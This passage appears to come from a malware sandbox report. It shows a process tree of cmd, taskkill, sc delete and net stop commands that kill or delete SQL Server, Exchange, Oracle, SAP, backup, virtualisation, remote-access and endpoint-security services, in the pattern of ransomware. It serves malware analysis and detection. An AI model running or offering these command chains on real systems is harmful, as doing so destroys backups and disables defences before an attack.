  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld-nt.exe /F
      4⤵
      PID:4688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4488
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlceip.exe /F
      4⤵
      PID:2856
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F
      4⤵
      PID:1740
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM store.exe
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeMailboxReplication.exe
      4⤵
      PID:4692
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe
      4⤵
      PID:2840
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeThrottling.exe
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM EdgeTransport.exe
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeTransportLogSearch.exe
      4⤵
      PID:4532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe
      4⤵
      PID:4764
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe
      4⤵
      Kills process with taskkill
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM DataCollectorSvc.exe
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.ServiceHost.exe
      4⤵
      Kills process with taskkill
      PID:2368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeMailboxAssistants.exe
      4⤵
      Kills process with taskkill
      PID:4624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msexchangerepl.exe
      4⤵
      PID:452
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MsExchangeFDS.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeMailSubmission.exe
      4⤵
      PID:3972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeTransport.exe
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe
      4⤵
      PID:300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowEngine"
    3⤵
    PID:4084
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DDSoftPwsTomcat9.exe /F
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8SmartClient.exe /F
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8SmartClientMonitor.exe /F
      4⤵
      PID:4620
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tomcat9.exe /F
      4⤵
      PID:4980
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SqlManagement.exe /F
      4⤵
      PID:4720
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"
      4⤵
      PID:4156
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ReportingServicesService.exe /F
      4⤵
      PID:4800
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ReportServer$SQLEXPRESS"
      4⤵
      PID:4716
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TongBackupSrv
      4⤵
      PID:4836
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TongBackupSrv.exe /F
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UFMsgCenterService.exe /F
      4⤵
      PID:296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "Cobian.exe" /F
      4⤵
      PID:1932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "SAP Business One.exe" /F
      4⤵
      PID:4380
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLBackupAndFTP Client Service"
      4⤵
      PID:4940
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBackupAndFTP Client Service"
        5⤵
        
        PID:2356
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "SqlBak.Service.exe" /F
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\net.exe
      net stop cbVSCService
      4⤵
      PID:1596
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop cbVSCService
        5⤵
        
        PID:5000
  - - C:\Windows\SysWOW64\net.exe
      net stop "SAP Business One RSP Agent Service"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:308
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SAP Business One RSP Agent Service"
        5⤵
        
        PID:2648
  - - C:\Windows\SysWOW64\net.exe
      net stop SAPB1iDIProxy
      4⤵
      PID:696
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAPB1iDIProxy
        5⤵
        
        PID:4556
  - - C:\Windows\SysWOW64\net.exe
      net stop "SAPB1iDIProxy_Monitor"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4720
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SAPB1iDIProxy_Monitor"
        5⤵
        
        PID:4716
  - - C:\Windows\SysWOW64\net.exe
      net stop SAPB1iEventSender
      4⤵
      PID:1296
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAPB1iEventSender
        5⤵
        
        PID:1852
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOClientAgent
      4⤵
      PID:724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOClientAgent
        5⤵
        
        PID:3632
  - - C:\Windows\SysWOW64\net.exe
      net stop SBODI_Server
      4⤵
      PID:4616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBODI_Server
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOJobServiceBackEnd
      4⤵
      PID:2592
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOJobServiceBackEnd
        5⤵
        
        PID:5096
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOMail
      4⤵
      PID:1816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOMail
        5⤵
        
        PID:4452
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOWFDataAccess
      4⤵
      PID:5028
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOWFDataAccess
        5⤵
        
        PID:3092
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOWorkflowEngine
      4⤵
      PID:2368
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOWorkflowEngine
        5⤵
        
        PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
    3⤵
    PID:380
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "XT800Service_Personal"
      4⤵
      PID:612
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLSERVERAGENT
      4⤵
      PID:3396
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLWriter
      4⤵
      PID:3260
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLBrowser
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:4332
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLSERVER
      4⤵
      PID:4628
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QcSoftService
      4⤵
      PID:4780
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLServerOLAPService
      4⤵
      PID:4984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMTools
      4⤵
      PID:3440
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VGAuthService
      4⤵
      PID:4100
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSDTC
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TeamViewer
      4⤵
      PID:4644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ReportServer
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RabbitMQ
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "AHS SERVICE"
      4⤵
      PID:4640
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Sense Shield Service"
      4⤵
      PID:4708
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSMonitorService
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSSyncService
      4⤵
      PID:3644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdAppService1300
      4⤵
      PID:4964
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQL$SQL2008
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLAgent$SQL2008
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdTaskService1300
      4⤵
      PID:4548
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VirboxWebServer
      4⤵
      PID:4328
  - - C:\Windows\SysWOW64\sc.exe
      sc delete jhi_service
      4⤵
      PID:5064
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LMS
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FontCache3.0.0.0"
      4⤵
      PID:4364
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdUpgradeService1300
      4⤵
      PID:3644
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
    3⤵
    PID:1804
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "DAService_TCP"
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "eCard-TTransServer"
      4⤵
      PID:288
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EnergyDataService
      4⤵
      PID:4360
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eCardMPService
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UI0Detect
      4⤵
      PID:4636
  - - C:\Windows\SysWOW64\sc.exe
      sc delete K3MobileService
      4⤵
      PID:4848
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TCPIDDAService
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\sc.exe
      sc delete WebAttendServer
      4⤵
      PID:3416
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UIODetect
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "wanxiao-monitor"
      4⤵
      PID:4624
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMAuthdService
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMUSBArbService
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMwareHostd
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "vm-agent"
      4⤵
      PID:2844
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VmAgentDaemon
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eSightService
      4⤵
      PID:3100
  - - C:\Windows\SysWOW64\sc.exe
      sc delete apachezt
      4⤵
      PID:1212
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OpenSSHd
      4⤵
      PID:4656
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Jenkins
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\sc.exe
      sc delete secbizsrv
      4⤵
      PID:3892
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLTELEMETRY
      4⤵
      PID:4692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSMQ
      4⤵
      PID:4836
  - - C:\Windows\SysWOW64\sc.exe
      sc delete smtpsvrJT
      4⤵
      PID:4648
  - - C:\Windows\SysWOW64\sc.exe
      sc delete zyb_sync
      4⤵
      PID:2732
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntHttpServer
      4⤵
      PID:4772
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntSvc
      4⤵
      PID:4656
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntClientSvc
      4⤵
      PID:308
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wampapache
      4⤵
      PID:5084
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NFWebServer
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSEARCH
      4⤵
      PID:4476
  - - C:\Windows\SysWOW64\sc.exe
      sc delete msftesql
      4⤵
      PID:4544
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SyncBASE Service"
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleDBConcoleorcl
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:4676
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleMTSRecoveryService
      4⤵
      PID:8
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
    3⤵
    PID:2836
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1ClrAgent
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1TNSListener
      4⤵
      PID:4436
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleServiceORCL
      4⤵
      PID:4868
  - - C:\Windows\SysWOW64\sc.exe
      sc delete aspnet_state @sc delete Redis
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\sc.exe
      sc delete JhTask
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:4656
  - - C:\Windows\SysWOW64\sc.exe
      sc delete XT800Service_Personal
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MCService
      4⤵
      PID:1296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:4104
  - - C:\Windows\SysWOW64\sc.exe
      sc delete allpass_redisservice_port21160
      4⤵
      PID:4160
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Flash Helper Service"
      4⤵
      PID:4660
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Kiwi Syslog Server"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2648
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS HiPriv Services"
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$FE_EXPRESS
      4⤵
      PID:60
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$FE_EXPRESS
        5⤵
        
        PID:3992
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT.exe /F & @net stop UFNet & @taskkill /IM MessageNotification.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete cbVSCService11 & @sc delete CobianBackup11"
    3⤵
    PID:1168
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ReportingServicesService.exe /F
      4⤵
      PID:4488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SQL Server Reporting Services"
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:4780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8CEServer.exe /F
      4⤵
      PID:4112
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ServerNT.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4832
  - - C:\Windows\SysWOW64\net.exe
      net stop UFNet
      4⤵
      PID:3612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MessageNotification.exe /F
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbVSCService11.exe /F
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbService.exe /F
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete cbVSCService11
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup11
      4⤵
      PID:4604
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
    3⤵
    PID:1808
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMAsyncService
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\sc.exe
      sc delete REPLICA
      4⤵
      PID:4684
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCATS
      4⤵
      PID:4952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCAVMCU
      4⤵
      PID:1296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RtcQms
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCMEETINGMCU
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCIMMCU
      4⤵
      PID:4692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCDATAMCU
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCCDR
      4⤵
      PID:5016
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectEventService16
      4⤵
      PID:3316
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectQueueService16
      4⤵
      PID:4628
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPAdminV4
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPSearchHostController
      4⤵
      PID:4952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTimerV4
      4⤵
      PID:4984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTraceV4
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectCalcService16
      4⤵
      PID:4656
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OSearch16
      4⤵
      PID:4432
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AppFabricCachingService
      4⤵
      PID:2464
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ADWS
      4⤵
      PID:3616
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoardRCService57
      4⤵
      PID:4732
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoard57
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vsvnjobsvc
      4⤵
      PID:4556
  - - C:\Windows\SysWOW64\sc.exe
      sc delete c2wts
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VisualSVNServer
      4⤵
      PID:4452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FlexNet Licensing Service 64"
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BestSyncSvc
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LPManager
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MediatekRegistryWriter
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:60
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RaAutoInstSrv_RT2870
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup10
      4⤵
      PID:1620
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLANYs_sem5
      4⤵
      PID:1856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CASLicenceServer
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLService
      4⤵
      PID:4984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete semwebsrv
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TbossSystem
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ErpEnvSvc
      4⤵
      PID:280
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.DispatchService
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.UpdateService
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Config.WindowsService
      4⤵
      PID:4452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.DataCenterService
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.SchedulingService
      4⤵
      PID:4984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Setup.InstallService
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MysoftUpdate
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\sc.exe
      sc delete edr_monitor
      4⤵
      PID:4516
  - - C:\Windows\SysWOW64\sc.exe
      sc delete abs_deployer
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\sc.exe
      sc delete savsvc
      4⤵
      PID:5004
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxMonitorService
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxService
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CloudExchangeService
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WorkerService2"
      4⤵
      PID:296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EASService
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CIS
      4⤵
      PID:4872
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KICkSvr
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      PID:4564
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8SmsSrv
      4⤵
      PID:4660
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OfficeClearCache
      4⤵
      PID:4656
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TurboCRM70
      4⤵
      PID:1968
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8DispatchService
      4⤵
      PID:4696
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8EISService
      4⤵
      PID:4632
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8EncryptService
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8GCService
      4⤵
      PID:4548
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8KeyManagePool
      4⤵
      PID:308
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8MPool"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4460
